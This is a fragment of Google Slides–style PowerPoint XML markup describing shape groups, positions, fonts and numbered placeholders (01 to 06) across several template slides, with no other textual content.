          <p:cNvPr id="17" name="Google Shape;17;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8" name="Google Shape;18;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9" name="Google Shape;19;p26"/>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0" name="Google Shape;20;p2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1" name="Google Shape;21;p26"/>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2" name="Google Shape;22;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3" name="Google Shape;23;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="857579" y="5009550"/>
            <a:ext cx="39165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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814274" y="-1364250"/>
            <a:ext cx="4161600" cy="5911200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t"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25" name="Google Shape;25;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1010433" y="3586940"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Google Shape;26;p26"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Google Shape;27;p26"/>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 name="Google Shape;28;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8608308" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Google Shape;29;p26"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Google Shape;30;p26"/>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 name="Google Shape;31;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11452750" y="904992"/>
            <a:ext cx="6322500" cy="1500900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t"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32" name="Google Shape;32;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13903015" y="3586940"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Google Shape;33;p26"/>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03</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Google Shape;34;p26"/>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35;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6977554" y="5009538"/>
            <a:ext cx="39165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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="12826254" y="5009538"/>
            <a:ext cx="39165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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="18674954" y="5009538"/>
            <a:ext cx="39165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 name="Google Shape;38;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="19473615" y="3586940"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Google Shape;39;p26"/>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r>
                <a:rPr lang="en-US" sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="5600">
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Google Shape;40;p26"/>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201"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p48"/>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04" name="Google Shape;204;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05" name="Google Shape;205;p48"/>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06" name="Google Shape;206;p4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07" name="Google Shape;207;p48"/>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08" name="Google Shape;208;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209" name="Google Shape;209;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="3676879"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="210" name="Google Shape;210;p48"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="211" name="Google Shape;211;p48"/>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 name="Google Shape;212;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5943313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="Google Shape;213;p48"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="214" name="Google Shape;214;p48"/>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 name="Google Shape;215;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="8196979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="Google Shape;216;p48"/>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217" name="Google Shape;217;p48"/>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8" name="Google Shape;218;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="10463379"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="219" name="Google Shape;219;p48"/>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220" name="Google Shape;220;p48"/>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1" name="Google Shape;221;p48"/>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2" name="Google Shape;222;p48"/>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48"/>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48"/>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8"/>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6" name="Google Shape;226;p48"/>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27" name="Google Shape;227;p48"/>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28"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p4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31" name="Google Shape;231;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32" name="Google Shape;232;p49"/>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33" name="Google Shape;233;p4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34" name="Google Shape;234;p49"/>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35" name="Google Shape;235;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236" name="Google Shape;236;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3467313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="237" name="Google Shape;237;p49"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Google Shape;238;p49"/>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9" name="Google Shape;239;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5333713"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="240" name="Google Shape;240;p49"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="241" name="Google Shape;241;p49"/>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 name="Google Shape;242;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="7180979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="243" name="Google Shape;243;p49"/>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244" name="Google Shape;244;p49"/>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 name="Google Shape;245;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="9040979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="246" name="Google Shape;246;p49"/>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247" name="Google Shape;247;p49"/>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8" name="Google Shape;248;p49"/>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49" name="Google Shape;249;p4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53" name="Google Shape;253;p49"/>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54" name="Google Shape;254;p49"/>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255" name="Google Shape;255;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1251686" y="10888246"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="256" name="Google Shape;256;p49"/>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257" name="Google Shape;257;p49"/>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8" name="Google Shape;258;p4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60"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p50"/>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63" name="Google Shape;263;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264" name="Google Shape;264;p50"/>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265" name="Google Shape;265;p5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266" name="Google Shape;266;p50"/>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267" name="Google Shape;267;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268" name="Google Shape;268;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="269" name="Google Shape;269;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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="270" name="Google Shape;270;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1" name="Google Shape;271;p50"/>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72" name="Google Shape;272;p50"/>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3" name="Google Shape;273;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="274" name="Google Shape;274;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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="275" name="Google Shape;275;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6" name="Google Shape;276;p50"/>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7" name="Google Shape;277;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="278" name="Google Shape;278;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279" name="Google Shape;279;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0" name="Google Shape;280;p50"/>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 name="Google Shape;281;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="282" name="Google Shape;282;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283" name="Google Shape;283;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4" name="Google Shape;284;p50"/>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5" name="Google Shape;285;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="286" name="Google Shape;286;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287" name="Google Shape;287;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8" name="Google Shape;288;p50"/>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9" name="Google Shape;289;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="290" name="Google Shape;290;p50"/>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06</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="291" name="Google Shape;291;p50"/>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2" name="Google Shape;292;p50"/>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93" name="Google Shape;293;p50"/>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94" name="Google Shape;294;p50"/>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95" name="Google Shape;295;p50"/>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296" name="Google Shape;296;p50"/>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97"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p51"/>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00" name="Google Shape;300;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301" name="Google Shape;301;p51"/>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302" name="Google Shape;302;p5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03" name="Google Shape;303;p51"/>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304" name="Google Shape;304;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305" name="Google Shape;305;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="3300915"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="306" name="Google Shape;306;p51"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="307" name="Google Shape;307;p51"/>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8" name="Google Shape;308;p51"/>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09" name="Google Shape;309;p51"/>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0" name="Google Shape;310;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="4877115"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="311" name="Google Shape;311;p51"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="312" name="Google Shape;312;p51"/>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3" name="Google Shape;313;p51"/>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4" name="Google Shape;314;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="6453315"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Google Shape;315;p51"/>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316" name="Google Shape;316;p51"/>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7" name="Google Shape;317;p51"/>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8" name="Google Shape;318;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="8029515"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="319" name="Google Shape;319;p51"/>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320" name="Google Shape;320;p51"/>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1" name="Google Shape;321;p51"/>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2" name="Google Shape;322;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="9605749"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="323" name="Google Shape;323;p51"/>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324" name="Google Shape;324;p51"/>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5" name="Google Shape;325;p51"/>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6" name="Google Shape;326;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218895" y="11182082"/>
            <a:ext cx="2071215" cy="1296816"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="327" name="Google Shape;327;p51"/>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06</a:t>
              </a:r>
              <a:endParaRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="328" name="Google Shape;328;p51"/>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9" name="Google Shape;329;p51"/>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30" name="Google Shape;330;p51"/>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31" name="Google Shape;331;p51"/>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32" name="Google Shape;332;p51"/>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33" name="Google Shape;333;p51"/>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34"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Google Shape;335;p52"/>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37" name="Google Shape;337;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338" name="Google Shape;338;p52"/>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339" name="Google Shape;339;p5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40" name="Google Shape;340;p52"/>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341" name="Google Shape;341;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342" name="Google Shape;342;p52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="3066140"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="343" name="Google Shape;343;p5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01</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="344" name="Google Shape;344;p5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5" name="Google Shape;345;p52"/>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46" name="Google Shape;346;p52"/>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7" name="Google Shape;347;p52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218958" y="4459807"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="348" name="Google Shape;348;p5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02</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="349" name="Google Shape;349;p5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0" name="Google Shape;350;p52"/>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51" name="Google Shape;351;p52"/>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2" name="Google Shape;352;p52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218892" y="5854874"/>
            <a:ext cx="1901385" cy="1190462"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="353" name="Google Shape;353;p5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03</a:t>
              </a:r>
              <a:endParaRPr sz="6900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="354" name="Google Shape;354;p5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5" name="Google Shape;355;p52"/>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56" name="Google Shape;356;p52"/>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7" name="Google Shape;357;p52"/>
          <p:cNvGrpSpPr/>
